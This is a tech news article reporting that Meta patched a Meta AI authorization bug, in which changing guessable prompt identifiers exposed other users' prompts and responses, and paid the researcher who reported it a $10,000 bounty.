Meta patches worrying security bug which could have exposed user AI prompts and responses - and pays the bug hunter $10,000
Expert flags there was a way to read other people's prompts

- Meta AI was assigning unique identifiers to prompts and responses
- The servers were not checking who had access rights to these identifiers
- The vulnerability was fixed in late January 2025
A bug which could have exposed user’s prompts and AI responses on Meta’s artificial intelligence platform has been patched.
The bug stemmed from the way Meta AI assigned identifiers to both prompts, and responses.
As it turns out, when a logged-in user tries to edit their previous prompt to get a different response, Meta assigns both of them a unique identifier. By changing that number, Meta’s servers would return someone else’s queries and results.
Criminals now use AI to invade your online privacy and scam you, making it hard to stay safer online. That’s why Norton VPN has combined advanced online privacy protection with AI-powered scam detection starting at $49.99 the first year (or $4.17/month).
No abuse so far
The bug was discovered by a security researcher and AppSecure founder, Sandeep Hodkasia, in late December 2024. He reported it to Meta, who deployed a fix on January 24, 2025, and paid out a $10,000 bounty for his troubles.
Hodkasia said that the prompt numbers that Meta’s servers were generating were easy to guess, but apparently - no threat actors thought of this before it was addressed.
This basically means that Meta’s servers weren’t double-checking if the user had proper authorization to view the contents.
This is clearly problematic in a number of ways, the most obvious one being that many people share sensitive information with chatbots these days.
Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!
Business documents, contracts and reports, personal information, all of these get uploaded to LLMs every day, and in many cases - people are using AI tools as psychotherapists, sharing intimate life details and private revelations.
This information can be abused, among other things, in highly customized phishing attacks, that could lead to infostealer deployment, identity theft, or even ransomware.
For example, if a threat actor knows that a person was prompting the AI for cheap VPN solutions, they could send them an email offering a great, cost-effective product, that is nothing more than a backdoor.
Via TechCrunch
You might also like
- Researcher tricks ChatGPT into revealing security keys - by saying "I give up"
- Take a look at our guide to the best authenticator app
- We've rounded up the best password managers
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
You must confirm your public display name before commenting
Please logout and then login again, you will then be prompted to enter your display name.